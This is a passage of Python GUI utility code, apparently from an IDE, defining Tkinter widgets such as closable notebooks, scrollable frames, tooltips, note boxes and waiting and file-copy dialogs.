panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
leftover_size = self._get_size() - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", 10))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu"))
menu.add_command(label=tr("Close"), command=self._close_tab_from_menu)
menu.add_command(label=tr("Close others"), command=self._close_other_tabs)
menu.add_command(label=tr("Close all"), command=self.close_tabs)
return menu
def _letf_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logging.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active", file=os.path.join(img_dir, "tab_close_active.gif")
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
Remember its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().in_simple_mode():
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
show_statusbar=False,
borderwidth=0,
relief="flat",
**tree_kw
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(
row=0, column=1, sticky=tk.NSEW, rowspan=2 if show_statusbar else 1
)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
if show_statusbar:
self.statusbar = ttk.Frame(self)
self.statusbar.grid(row=1, column=0, sticky="nswe")
else:
self.statusbar = None
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
sequence.strip("<>").replace("Key-", "").replace("KeyPress-", "").replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
if len(parts[-1]) == 1 and parts[-1].isupper() and not "Shift" in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def __init__(
self,
master=None,
style="Text",
tag_current_line=False,
indent_with_tabs=False,
replace_tabs=False,
cnf={},
**kw
):
super().__init__(
master=master,
style=style,
tag_current_line=tag_current_line,
indent_with_tabs=indent_with_tabs,
replace_tabs=replace_tabs,
cnf=cnf,
**kw
)
self._last_event_changed_line_count = False
def direct_insert(self, index, chars, tags=None, **kw):
try:
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
line_before = self.get(concrete_index + " linestart", concrete_index + " lineend")
self._last_event_changed_line_count = "\n" in chars
return tktextext.EnhancedText.direct_insert(self, index, chars, tags=tags, **kw)
finally:
line_after = self.get(concrete_index + " linestart", concrete_index + " lineend")
trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
chars, line_before, line_after
)
get_workbench().event_generate(
"TextInsert",
index=concrete_index,
text=chars,
tags=tags,
text_widget=self,
trivial_for_coloring=trivial_for_coloring,
trivial_for_parens=trivial_for_parens,
)
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
chars = self.get(index1, index2)
self._last_event_changed_line_count = "\n" in chars
line_before = self.get(
concrete_index1 + " linestart",
(concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
)
return tktextext.EnhancedText.direct_delete(self, index1, index2=index2, **kw)
finally:
line_after = self.get(
concrete_index1 + " linestart",
(concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
)
trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
chars, line_before, line_after
)
get_workbench().event_generate(
"TextDelete",
index1=concrete_index1,
index2=concrete_index2,
text_widget=self,
trivial_for_coloring=trivial_for_coloring,
trivial_for_parens=trivial_for_parens,
)
def _is_trivial_edit(self, chars, line_before, line_after):
# line is taken after edit for insertion and before edit for deletion
if not chars.strip():
# linebreaks, including with automatic indent
# check it doesn't break a triple-quote
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = trivial_for_coloring
elif len(chars) > 1:
# paste, cut, load or something like this
trivial_for_coloring = False
trivial_for_parens = False
elif chars == "#":
trivial_for_coloring = "''''" not in line_before and '"""' not in line_before
trivial_for_parens = trivial_for_coloring and not re.search(PARENS_REGEX, line_before)
elif chars in "()[]{}":
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = False
elif chars == "'":
trivial_for_coloring = "'''" not in line_before and "'''" not in line_after
trivial_for_parens = False # can put parens into open string
elif chars == '"':
trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
trivial_for_parens = False # can put parens into open string
elif chars == "\\":
# can shorten closing quote
trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
trivial_for_parens = False
else:
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = trivial_for_coloring
return trivial_for_coloring, trivial_for_parens
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
elif float(first) > 0.001 or float(last) < 0.009:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError("cannot use pack with this widget")
def place(self, **kw):
raise tk.TclError("cannot use place with this widget")
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
if running_on_mac_os():
try:
# Must be the first thing to do after creating window
# https://wiki.tcl-lang.org/page/MacWindowStyle
tw.tk.call(
"::tk::unsupported::MacWindowStyle", "style", tw._w, "help", "noActivates"
)
if get_tk_version_info() >= (8, 6, 10) and running_on_mac_os():
tw.wm_overrideredirect(1)
except tk.TclError:
pass
else:
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
class NoteBox(CommonDialog):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle", "style", self._w, "help", "noActivates"
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox("%d.%d" % (focus.end_lineno, focus.end_col_offset))
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError("Unsupported focus")
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d" % (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(self, *content_items: Union[str, List], target=None, focus=None) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
class EnhancedVar(tk.Variable):
def __init__(self, master=None, value=None, name=None, modification_listener=None):
if master is not None and not isinstance(master, (tk.Widget, tk.Wm)):
raise TypeError("First positional argument 'master' must be None, Widget or Wm")
super().__init__(master=master, value=value, name=name)
self.modified = False
self.modification_listener = modification_listener
if sys.version_info < (3, 6):
self.trace("w", self._on_write)
else:
self.trace_add("write", self._on_write)
def _on_write(self, *args):
self.modified = True
if self.modification_listener:
try:
self.modification_listener()
except Exception:
# Otherwise whole process will be brought down
# because for some reason Tk tries to call non-existing method
# on variable
get_workbench().report_exception()
class EnhancedStringVar(EnhancedVar, tk.StringVar):
pass
class EnhancedIntVar(EnhancedVar, tk.IntVar):
pass
class EnhancedBooleanVar(EnhancedVar, tk.BooleanVar):
pass
class EnhancedDoubleVar(EnhancedVar, tk.DoubleVar):
pass
def create_string_var(value, modification_listener=None) -> EnhancedStringVar:
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return EnhancedStringVar(None, value, None, modification_listener)
def create_int_var(value, modification_listener=None) -> EnhancedIntVar:
"""See create_string_var"""
return EnhancedIntVar(None, value, None, modification_listener)
def create_double_var(value, modification_listener=None) -> EnhancedDoubleVar:
"""See create_string_var"""
return EnhancedDoubleVar(None, value, None, modification_listener)
def create_boolean_var(value, modification_listener=None) -> EnhancedBooleanVar:
"""See create_string_var"""
return EnhancedBooleanVar(None, value, None, modification_listener)
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title="Remove linenumbers",
message="Do you want to remove linenumbers from pasted text?",
default=messagebox.YES,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
return len(lines) > 2 and all([len(split_after_line_number(line)) == 2 for line in lines])
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
def center_window(win, master=None):
# for backward compat
return assign_geometry(win, master)
def assign_geometry(win, master=None, min_left=0, min_top=0):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
# ie. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
left = max(left, min_left)
top = max(top, min_top)
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(CommonDialog):
def __init__(self, master, async_result, description, title="Please wait!", timeout=None):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description="Working"):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
class FileCopyDialog(CommonDialog):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title(tr("Copying"))
if description is None:
description = tr("Copying\n %s\nto\n %s") % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(main_frame, maximum=os.path.getsize(source), length=200)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(main_frame, text=tr("Cancel"), command=self._cancel)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind("<Escape>", self._cancel, True) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
self._copy_progess = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(CommonDialogEx):
def __init__(
self,
master=None,
title="Choose one",
question: str = "Choose one:",
choices=[],
